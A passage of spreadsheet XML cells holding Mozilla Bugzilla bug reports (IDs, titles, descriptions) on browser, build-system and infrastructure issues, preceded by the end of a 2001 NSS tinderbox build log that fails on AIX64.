ld: 0711-224 WARNING: Duplicate symbol: .strcmp
ld: 0711-345 Use the -bloadmap or -bnoquiet option to obtain more information.
chmod +x AIX4.3_64_DBG.OBJ/libsmime3.so
../../../coreconf/nsinstall/AIX4.3_64_DBG.OBJ/nsinstall -R -m 664
AIX4.3_64_DBG.OBJ/libsmime.a ../../../../dist/AIX4.3_64_DBG.OBJ/lib
../../../coreconf/nsinstall/AIX4.3_64_DBG.OBJ/nsinstall -R -m 775
AIX4.3_64_DBG.OBJ/libsmime3.so ../../../../dist/AIX4.3_64_DBG.OBJ/lib
gmake[2]: Leaving directory
`/export/nss_tbx_aix64/builds/tinderbox/AIX64/mozilla/security/nss/lib/smime'
cd crmf gmake libs
gmake[2]: Entering directory
`/export/nss_tbx_aix64/builds/tinderbox/AIX64/mozilla/security/nss/lib/crmf'
xlC_r -o AIX4.3_64_DBG.OBJ/crmfenc.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfenc.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmftmpl.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmftmpl.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmfreq.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfreq.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmfpop.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfpop.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmfdec.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfdec.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmfget.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfget.c
xlC_r -o AIX4.3_64_DBG.OBJ/crmfcont.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  crmfcont.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmmfasn1.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  cmmfasn1.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmmfresp.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  cmmfresp.c
xlC_r -o AIX4.3_64_DBG.OBJ/cmmfrec.o -c -g -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DDEBUG -UNDEBUG -DDEBUG_svbld
-I../../../../dist/AIX4.3_64_DBG.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/dbm  cmmfrec.c
cmmfrec.c line 230.35: 1506-068 (S) Operation between types struct
CERTCertificateStr* and int is not allowed.
gmake[2]: *** [AIX4.3_64_DBG.OBJ/cmmfrec.o] Error 1
gmake[2]: Leaving directory
`/export/nss_tbx_aix64/builds/tinderbox/AIX64/mozilla/security/nss/lib/crmf'
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory
`/export/nss_tbx_aix64/builds/tinderbox/AIX64/mozilla/security/nss/lib'
gmake: *** [libs] Error 2
Elapsed Time = 00:02:38
Wed 21 Nov 2001 10:19:12
sh -c cd /export/nss_tbx_aix64/builds/tinderbox/AIX64 rsh
tortoise.red.iplanet.com  mailx -s 'NSS_TIP_AIX64\(AIX64\):tinderbox-Failed'
svbld  &lt; /export/nss_tbx_aix64/logs/tinderbox/AIX64/tinderbox.rep.1 
Wed 21 Nov 2001 10:19:12
Elapsed Time = 00:00:01
Wed 21 Nov 2001 10:19:13
tinderbox: tree: NSS
tinderbox: builddate: 1006365801
tinderbox: status: busted
tinderbox: build: aix64
tinderbox: errorparser: unix
tinderbox: buildfamily: AIX
No More Errors</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-295394</t>
  </si>
  <si>
    <t>reporter needs a next and previous navigation feature for incident lists</t>
  </si>
  <si>
    <t>When navigating through lists of incidents it would be great to have like
Bugzilla bug lists a previous in list | show list | next in list set of links
on each incident.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-455797</t>
  </si>
  <si>
    <t>birthday picker doesn't let me enter certain dates resets day and year</t>
  </si>
  <si>
    <t>A few tests with the new birthday datepicker using a German system which has the DD.MM.YYYY date format:
Bug 1:
1. Enter 20.01. and press OK.
Result: In the details pane of Address Book window it displays:
Sat Jan 20 1900 00:00:00 GMT +0100
Expected: Montag 20. Januar (localized format without year time or timezone)
The error console displays:
Error: aAddressData is undefined
Source File: chrome://messenger/content/msgHdrViewOverlay.js
Line: 1021
This error is being logged every time I leave the card by pressing OK.
2. Enter 20.01.1975:
Display in the details pane: Montag 20. Januar 1975
--&gt; ok
Bug 2:
1. Go to the same card which still has 20.01.1975 leave the day as is.
2. Tab to the month and modify it by entering a different value or use the up or down arrow keys:
Result: The day jumps to the current day (18 right now).
Bug 3:
1. Enter 31.07.1975:
Result: Display in the details pane: Donnerstag 31. Juli 1975
2. Enter 01.08.1975 (Aug 1 1975):
Result: Display in the details pane: Sonntag 1. Dezember 1974 (!)
3. Open the card again: it displays the current day and month (Sep 17)
JS Console displays: Error: uncaught exception: Invalid Month
Bug 4:
1. Enter 30.06.
2. Tab away and back to the day field and enter 31
3. Press tab
Result: 01.06.
Expected: June 31 doesn't exist so switch to the next day (July 1) when I leave the datepicker but don't do anything until I have left the day and month field since I might be going to enter a valid date like 31.07. (July 31).</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-476894</t>
  </si>
  <si>
    <t>Add a rewrite rule to MDC</t>
  </si>
  <si>
    <t>We need a rewrite rule to direct:
https://developer.mozilla.org/Template
to
https://developer.mozilla.org/Template:
(note the colon on the second one -- people never remember to enter the colon without which they wind up on an empty page)</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-297488</t>
  </si>
  <si>
    <t>Irregular crashes when closing tab/windows or quiting Camino with bfcache enabled [@ nsChildView::GetParent() + 0x24]</t>
  </si>
  <si>
    <t>Camino 2005061108 (v0.9a)
With bfcache enabled (browser.sessionhistory.max_viewers 5) Camino will
sometimes crash when I close a tab/window or quit Camino. No crash with bfcache
turned off. Just before the crash Camino will hang for some seconds (with the
nice spinning bathball).</t>
  </si>
  <si>
    <t>torben</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-291088</t>
  </si>
  <si>
    <t>bloat test files should not be included in optimized builds or release builds</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/aviary101branch/source/build/Makefile.in#39
Firefox builds contain extra stuff in the /res/ directory that shouldn't be
there.  In this case bloattest</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-281056</t>
  </si>
  <si>
    <t>Build error when disable-v1-string-abi is applied</t>
  </si>
  <si>
    <t>The errors occur when the ac_add_options --disable-v1-string-abi
option is applied. 
Mac OS X 10.3.7
https://bugzilla.mozilla.org/show_bug.cgi?id=235499#c39</t>
  </si>
  <si>
    <t>CORE-275823</t>
  </si>
  <si>
    <t xml:space="preserve"> line doesn't get hide when you change its visibility to hidden.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a6) Gecko/20041220 Firefox/1.0+
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8a6) Gecko/20041220 Firefox/1.0+
If I have a Mathml code like $a/b$
(ab) 
and this MathML code is in a div and that div gets hidden the bar of the
fraction will still be visible.
Reproducible: Always</t>
  </si>
  <si>
    <t>jose.aliste</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-231610</t>
  </si>
  <si>
    <t>topjobs.ie sends UTF-16LE encoded pages without charset specified in http header</t>
  </si>
  <si>
    <t>works in M$ IExplorer</t>
  </si>
  <si>
    <t>BUGZILLA-275939</t>
  </si>
  <si>
    <t>Classification templates use wrong filtering in URLs</t>
  </si>
  <si>
    <t>In urls the classififcation code uses 'FILTER html'. It should use url_quote.
Patch in a mo....</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-177750</t>
  </si>
  <si>
    <t>itelevision.fr - complaining about old version of Netscape although using 7.0</t>
  </si>
  <si>
    <t>1. Run Netscape 7.0 RTM
2. go to http://www.itelevision.fr
3. A JavaScript alert pops up: This page requires version 4 or later of
Netscape Navigator or Internet Explorer
note: tested on Win 2000 MacOS 9 and MacOS X.
Culprit js code found in the source:
var msg = This page requires version 4 or later of\n Netscape Navigator or
Internet Explorer
var dyn = (document.layers || document.all) ? true : alert(msg)</t>
  </si>
  <si>
    <t>CORE-452570</t>
  </si>
  <si>
    <t>NanoAssert doesn't end the message with a line break</t>
  </si>
  <si>
    <t>Created attachment 335845
patch
Without patch Abort trap runs into message:
nanojit/Nativei386.cpp:738: failed assertion `0'
Assertion failed: (((rmask(rr) &amp; FpRegs) != 0)) (nanojit/Nativei386.cpp:738)Abort trap
With patch ordering is slightly more correct:
Assertion failed: (((rmask(rr) &amp; FpRegs) != 0)) (nanojit/Nativei386.cpp:738)
nanojit/Nativei386.cpp:738: failed assertion `0'
Abort trap</t>
  </si>
  <si>
    <t>CORE-766007</t>
  </si>
  <si>
    <t>Create scrollframes for frameset documents</t>
  </si>
  <si>
    <t>We might as well. Framesets aren't common the optimization of avoiding scrollframes is insigificant and it simplifies things across mobile and desktop and reduces the number of different code paths.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-480125</t>
  </si>
  <si>
    <t>mobile-linux-arm tinderbox needs libxdamage-dev and libxcomposite-dev packages</t>
  </si>
  <si>
    <t>These headers are needed for building with composited plugin support aka bug #442109.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-609043</t>
  </si>
  <si>
    <t>Add support for Open Web Apps</t>
  </si>
  <si>
    <t>Provide support for Open Web Apps (https://wiki.mozilla.org/Labs/Apps) to allow seamless installation from within web pages.</t>
  </si>
  <si>
    <t>FIREFOX-302193</t>
  </si>
  <si>
    <t>Print Preview Dialog: tabbing gets stuck when launched with some pages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Print Preview Dialog has no visual focus when the dialog is opened. Nothing
happens when the user presses the tab to navigate.
Reproducible: Always
Steps to Reproduce:
1. Alt + F for file menu
2. Press V for 'print preview'
3.
Actual Results:  
Tabbing results in no navigation of the 'print preview'.
Expected Results:  
Should have a visual focus of the 'print preview'.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-430052</t>
  </si>
  <si>
    <t>ssltunnel is finding its way out into the real world</t>
  </si>
  <si>
    <t>ssl tunnel is getting packaged into the firefox app bundle on mac and I think xulrunner and the sdk everywhere. Need to not package it.</t>
  </si>
  <si>
    <t>CORE-515311</t>
  </si>
  <si>
    <t>nanojit: kill reservations in the PPC backend</t>
  </si>
  <si>
    <t>Bug 514349 started killing off Reservations.  This needs to continue in the PPC backend.  I can make an attempt at a patch but I can't test it at all and I'm not even sure if TraceMonkey runs on PPC.  Any suggestions on how best to proceed?</t>
  </si>
  <si>
    <t>SEAMONKEY-94062</t>
  </si>
  <si>
    <t>Support for MOZ_NSS_AUTOCONF should be removed.</t>
  </si>
  <si>
    <t>The support for MOZ_NSS_AUTOCONF should be removed
from the Mozilla client's build system on the tip.
The NSS autoconf branch (cvs tag NSS_CLIENT_BRANCH)
is an experimental branch that the NSS team do not
support.
I will attach a patch.</t>
  </si>
  <si>
    <t>CORE-102440</t>
  </si>
  <si>
    <t>Mozilla obeys invalid maxwidth attribute on text form controls</t>
  </si>
  <si>
    <t>The above url has a form with an text input that has a maxwidth attribute:
As far as I can tell there is no version of HTML that has a maxwidth attribute
for text input controls.  I think the author of the page probably meant
maxlength but I really am not sure.
Mozilla however obeys this maxwidth attribute rendering the text control 40
pixels wide.  In fact it takes it over the size attribute which has a reasonable
value.  As a result the form is unusable in Mozilla as the text input control
is far too narrow to actually type in.
Both NN4 and Opera ignore the maxwidth attribute and render the text control 30
characters wide which is what I think Mozilla should do as well.
Tested with Mozilla trunk build 2001092906 on Linux.</t>
  </si>
  <si>
    <t>smoehle</t>
  </si>
  <si>
    <t>FIREFOX-206268</t>
  </si>
  <si>
    <t>Clicking Go button with a bookmark keyword expression in URL/location bar does search instead</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030509 Mozilla Firebird/0.6
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6
You need at least one bookmark with a keyword and the Go button must exist on
your button toolbar to verify this.  Type in your bookmark keyword expression in
the URL/location bar and instead of hitting Enter click the Go button.  Instead
of evaluating your bookmark keyword string your typed text is sent off to your
default search engine.
Reproducible: Always
Steps to Reproduce:
Expected Results:  
Bookmark keyword expression should be evaluated as though Enter had been
pressed.  It is important that the fix for this does not break middle-click on
the Go button (which if you have things configured that way would evaluate
your bookmark keyword expression in a new tab).</t>
  </si>
  <si>
    <t>paxunix</t>
  </si>
  <si>
    <t>SEAMONKEY-24767</t>
  </si>
  <si>
    <t>[feature] make chrome registry point into jar by default</t>
  </si>
  <si>
    <t>We need to rework the chrome registry and chrome urls to map to jar files. 
The latest word on this was the thread: 
news://news.mozilla.org/3838BA4B.4963840C%40netscape.com</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-616320</t>
  </si>
  <si>
    <t>Turn on nightly builds on Places branch</t>
  </si>
  <si>
    <t>We'd like to get nightly builds turned on for the Places branch for a short period of time to get more widespread testing.  I expect this will last for about a week until we merge into mozilla-central at which point I'll file a bug to disable them.</t>
  </si>
  <si>
    <t>FIREFOX-352238</t>
  </si>
  <si>
    <t>[RTL] Go button</t>
  </si>
  <si>
    <t>Go button is not flipped in RTL locales.
screenshot: attachment 237841</t>
  </si>
  <si>
    <t>CORE-444829</t>
  </si>
  <si>
    <t>system color profile handle not freed on thebes shutdown</t>
  </si>
  <si>
    <t>not really an issue for performance but probably should be fixed before ship.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-527129</t>
  </si>
  <si>
    <t>Fennec: add bookmark dialog is not localized in Danish</t>
  </si>
  <si>
    <t>In multi-locale for Fennec's beta 5 the add bookmark dialog off of the gold star is not localized to Danish when running in a Danish locale. It says Page Bookmarked at the top and the buttons say Edit and Remove in the dialog.
Build id: Mozilla/5.0 (X11 U Linux armv7l Nokia N900 da rv:1.9.2b2pre)
Gecko/20091106 Firefox/3.6b2pre Fennec/1.0b5
Steps to Reproduce:
1. Open a multi-locale version of Fennec
2. Click on Options -&gt; Preferences -&gt; Languages
3. Select Dansk and restart
4. Once Fennec is started click on the gold star in the right panel
Actual Results:
Add bookmark dialog is not localized
Expected Results:
Add bookmark dialog should be in Danish.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-35833</t>
  </si>
  <si>
    <t>shut down cvsupd</t>
  </si>
  <si>
    <t>IMHO obsolete service we could get rid of.
- Accourding to logs we get a hit once every 2 weeks.
- cvs-mirror is rather fast nowadays
- module definitions are outdated
- reduce my workload
If I don't hear objections by 4/17/00 I'll shut it down.</t>
  </si>
  <si>
    <t>CORE-300011</t>
  </si>
  <si>
    <t>Plugin's WINCE fix up</t>
  </si>
  <si>
    <t>I have been having problems with some of the code in plugins:
http://weblogs.mozillazine.org/dougt/archives/008381.html
Basically function pointer addresses do not work as expected using the clarm
compiler for windows ce.  
Looking at the subclassing we are doing I am not sure that the WindowCE
implementation needs to to handle any of the cases that the desktop had to
including popup blocking mouse tracking or noisy plugins.</t>
  </si>
  <si>
    <t>THUNDERBIRD-459099</t>
  </si>
  <si>
    <t>add ids to the menus that don't have one already in the editorOverlay.xuls</t>
  </si>
  <si>
    <t>Created attachment 342295
proposed fix
Not all menu items have ids in the editorOverlay.xul files. There are times those are handy so lets add ids there. (No functional change.)</t>
  </si>
  <si>
    <t>FIREFOX-428764</t>
  </si>
  <si>
    <t>CSS and packaging changes (/toolkit) for APNG throbber</t>
  </si>
  <si>
    <t>Created attachment 315343
Patch v.1
Followup to bug 421595. Changes in /toolkit to use the new APNG throbbers.
* Does not delete old throbber packaging since mailnewscalendar are still using Throbber-small.gif.
* Does not change /toolkit/crashreporter usage since I assume that doesn't support APNG.
* Fixes uses of loading_16.gif in Pinstripe which is no longer packaged and thus broken.</t>
  </si>
  <si>
    <t>CORE-484309</t>
  </si>
  <si>
    <t>xpcom violates xpcom calling conventions</t>
  </si>
  <si>
    <t>nsErrorService (via nsInt2StrHashtable) and nsCategoryManager don't use the XPCOM allocator to allocate return strings while nsComponentManager doesn't use the XPCOM deallocator to free strings returned from XPCOM methods.</t>
  </si>
  <si>
    <t>SEAMONKEY-87004</t>
  </si>
  <si>
    <t>make xpinstall build separate in STATIC build</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-255705</t>
  </si>
  <si>
    <t>The was an error starting ChatZilla. message (string) 'this.docShell has no properties'</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a3) Gecko/20040815
The was an error starting ChatZilla. Please report the following information:
+ message (string) 'this.docShell has no properties'
+ fileName (string) 'chrome://global/content/bindings/browser.xml'
+ lineNumber (number) 0
+ stack (string) 381 chars
+ name (string) 'TypeError'
*
steps:
1. load about:config
2. toggle browser.frames.enabled
3. quit
4. run mozilla
5. cmd-6
6. read dialog
7. smile
8-20. try and figure out how to copy the error message from the dialog since
domi and navigator don't work. venkman barely did so eventually i saved the
messageText as a preference restored frames.enabled and ran navigator to
about:config.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-720500</t>
  </si>
  <si>
    <t>Update builder.addons.mozilla.org on 1/25 @ 1400</t>
  </si>
  <si>
    <t>https://etherpad.mozilla.org/bamo-0-9-25-push</t>
  </si>
  <si>
    <t>FIREFOX-351591</t>
  </si>
  <si>
    <t>Pressing Enter in an exceptions dialog adds an unwanted 'scheme:http' entry in the list</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 fr-FR rv:1.7.2) Gecko/20040804
Build Identifier: Mozilla/5.0 (X11 U Linux i686 fr rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
All dialogs called with the permissions.xul file have a wrong behaviour with the Enter key. This bug is not the same as bug 324187.
Reproducible: Always
Steps to Reproduce:
1. Open the Preference/Options window
2. Click on any of the Exceptions buttons (in Content or Security)
3. Set the focus to the text field type nothing and press Enter
Actual Results:  
Actual results: 'scheme:http' appears in the list
Expected Results:  
Expected: nothing happens
This behaviour also appears in Firefox 2.0 beta2
(I suggest a simple test with textbox.value in http://lxr.mozilla.org/mozilla1.8/source/browser/components/preferences/permissions.js#105 for instance)</t>
  </si>
  <si>
    <t>chbok</t>
  </si>
  <si>
    <t>BUGZILLA-285705</t>
  </si>
  <si>
    <t>[PostgreSQL] Index on some text columns on Postgres could use LOWER</t>
  </si>
  <si>
    <t>Some (maybe all) text columns will be searched case-insensitive. We are
currently trying to fix this for login_name and realname columns on postgres
(see bug 285695). This comparison will be done on postgres using LOWER(column).
To get the best performance we need these columns to have functional index
using LOWER(column) as well.
We need either a means of specifying that particular index will be functional
LOWER() or we need to modify postgres schema to create both normal and LOWER
index on all text fields.</t>
  </si>
  <si>
    <t>FIREFOX-342909</t>
  </si>
  <si>
    <t>Scroll buttons do not have button-like appearance look like static icons and offer no feedback</t>
  </si>
  <si>
    <t>The tab scroll buttons need a button appearance on mouse over - it at the very least needs an outset frame on hover and a click down appearance right now they look like static icons and offer no feedback when clicked.</t>
  </si>
  <si>
    <t>SOCORRO-971965</t>
  </si>
  <si>
    <t>App for generating API tokens</t>
  </si>
  <si>
    <t>We need a django app that allows signed in users to generate tokens that they can use to auth against the public API (/api/).
* Each token would map to 1 or more permissions.
* Each token would take an optional notes field where you can type in some free text
* Generated token must have a expiration date. By default this will be 90 days.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-378599</t>
  </si>
  <si>
    <t>developer-stage server is scary slow</t>
  </si>
  <si>
    <t>This has been a problem for ages but is really starting to impede getting work done.  Page loads time out about 50% of the time and when they don't time out they typically take at least 45 seconds to load.  It's making developing and testing MDC updates very very tedious.  Could someone please look into it?  Thanks!</t>
  </si>
  <si>
    <t>SEAMONKEY-316023</t>
  </si>
  <si>
    <t>FTP uploads don't work</t>
  </si>
  <si>
    <t>Regression from bug 298842 one call site got missed.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-18778</t>
  </si>
  <si>
    <t>gila filesystem is full</t>
  </si>
  <si>
    <t>I get this when I try to check stuff in or do cvs history on gila:
can't create temporary directory
No space left on device</t>
  </si>
  <si>
    <t>CORE-342322</t>
  </si>
  <si>
    <t>ASSERTION: Can only remove a singleton element when de-floating something</t>
  </si>
  <si>
    <t>###!!! ASSERTION: Can only remove a singleton element: '!aElement-&gt;mNext' file /Users/admin/trunk/mozilla/layout/generic/nsLineBox.cpp line 941
This assertion was added in bug 317278.</t>
  </si>
  <si>
    <t>CORE-231081</t>
  </si>
  <si>
    <t>Checkboxes and radio buttons with dynamic selector :checked  and adjacent combinator does not reresolve style</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6b) Gecko/20031216 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6b) Gecko/20031216 Firebird/0.7+
From: http://bugzilla.mozilla.org/show_bug.cgi?id=15608#c60
See testcase that I'm attaching.
Using this snippet in html:
check #c1
and this style:
input{display:none}
input:checked+label{background-color:green}
you can still check the checkbox and the label becomes green but unchecking the
checkbox (which works with display:none) the label stays green.
Checking/unchecking a checkbox to the left of the original does reresolve the
style in the right way.
Reproducible: Always
Steps to Reproduce:
1. Press button: toggle display radio/checkbox buttons -&gt; inputs have display:none
2. check/uncheck the checkboxes
3.
Actual Results:  
See Details
Expected Results:  
Reresolve the style of the labels in the right way.
An easy workaround for this problem is to use:
input {visibility:hiddenposition:absolute} 
This works and has the same effect as display:none</t>
  </si>
  <si>
    <t>CORE-442715</t>
  </si>
  <si>
    <t>-moz-border-radius does not render properly in speed.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a1pre) Gecko/2008063003 Minefield/3.1a1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a1pre) Gecko/2008063003 Minefield/3.1a1pre
The url shows what I mean and this only happens while I'm resizing an element or more specificly a div with a rounded border. The radius is being applied in a seperate css file and it's set to 20px. I have the most recent nightly build as would be indicated by the build identifier. I'm using an 8800gtx and q6600 so I can't see it being an issue of not being able to render fast enough.
If I'm mistaken on my methods of applying a rounded border expecting it to render fine while being re sized than I apologize.
To give perspective trying the same effect in safari it cheats and turns the border into a sharp edged border before finishing the rendering and turning it back into a rounded border and it is completely smooth however not exactly what I expect.
Reproducible: Always
Steps to Reproduce:
1.create a div and give it a border using -moz-border-radius: 20px
2.resize the div using timers (in order to see it clearly one second for each 200 px)
Actual Results:  
I see what is shown by the link I included under the URL field.
Expected Results:  
a straight outer border and clean rounded corners.
This is my first time reporting a bug for anything however although I'm a noob at bug reporting I'm an open-minded comp. sci. student so if you need more info just tell me and I'll do my best to provide it.
about:buildconfig
Build platform
target
i686-pc-mingw32
Build tools
Compiler 	Version 	Compiler flags
cl 	14.00.50727.762 	-TC -nologo -W3 -Gy -Fd$(PDBFILE)
cl 	14.00.50727.762 	-GR- -TP -nologo -Zc:wchar_t- -W3 -Gy -Fd$(PDBFILE)
Configure arguments
--enable-application=browser --enable-update-channel=nightly --enable-update-packaging --enable-jemalloc</t>
  </si>
  <si>
    <t>mccarre</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-186412</t>
  </si>
  <si>
    <t>unused functions in nsIDrawingSurface</t>
  </si>
  <si>
    <t>(cc'ing some people who might be interested in this kind of stuff)
nsIDrawingSurface has some unused functions:
IsOffscreen - only used inside the gfx part of the photon port (ie. this
function could be made part of only the photon drawing surface)
http://lxr.mozilla.org/seamonkey/search?string=IsOffscreen%5C%28
IsPixelAddressable: lxr finds no function calls only declarations/Definitions
http://lxr.mozilla.org/seamonkey/search?string=IsPixelAddressable
GetPixelFomat has three callers in SVG code (one of them in debug code) so it
probably can not be removed (on first sight they look like they really need to
call it)</t>
  </si>
  <si>
    <t>FIREFOX-312298</t>
  </si>
  <si>
    <t>After deleting a bookmark in the bookmarks-menu and a click in the page the menu text color in the selection has the wrong color (black) and stays forever</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051012 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b5) Gecko/20051012 Firefox/1.4.1
After deleting a bookmark in the bookmarks-menu and a click in the page the
menu text color in the selection has the wrong color and stays forever (you'll
need to click the menu again..).
Also in trunk.
Reproducible: Always
Steps to Reproduce:
1. Make a new profile and import some bookmarks.
2. In the main menu delete a bookmark.
3. Click in the page then open the menu again (this is a way to go around Bug
290085).
4. Open the same bookmarks menu again. You'll see that the selection is still
blue but the text has the wrong color (black instead of white).
5. It can be hard to get rid of the selection again.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-417374</t>
  </si>
  <si>
    <t>add tsspider to quick cycle talos machines</t>
  </si>
  <si>
    <t>we're going to be hacking on this a lot over the next little bit. quick feedback will really help. we can turn it off after b4.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-477856</t>
  </si>
  <si>
    <t>Add buttons to Affiliates Page</t>
  </si>
  <si>
    <t>Created attachment 361568
80x15__orange.png
Please check in the following images to the SFx affiliates button repository.
Should be in the FF3.1 Category.
1. sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/80x15_orange.png
2.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/80x15_blu.png
3.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/80x15_grn.png
4.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/80x15_purp.png
5.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/110x32_best_yet.png
6.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/110x32_get.png
7.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/200x32_all.png
8.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/200X32_best.png
9.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/468x60.png
10.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/80x15_edit.psd
11.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/110x32_best_edit.psd
12.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/110x32_get_edit.psd
13.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/200X32_all_edit.psd
14.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/200X32_best_edit.psd
15.sfximages.mozilla.org/affiliates/Buttons/Firefox3.1/468x60_edit.psd</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-394063</t>
  </si>
  <si>
    <t>HTML Form Controls</t>
  </si>
  <si>
    <t>Consider continuing to force s to Aqua</t>
  </si>
  <si>
    <t>Styled selects will now fall back to gfx when styled which look really really bad in a way that gfx buttons and text fields do not. We could do a forms.css override/fork where we !important a bunch of rules to keep selects unstyled and Aqua-looking.</t>
  </si>
  <si>
    <t>CORE-914870</t>
  </si>
  <si>
    <t>[B2G] [Buri] [1.2] [Music] Long delay experienced when a song is selected</t>
  </si>
  <si>
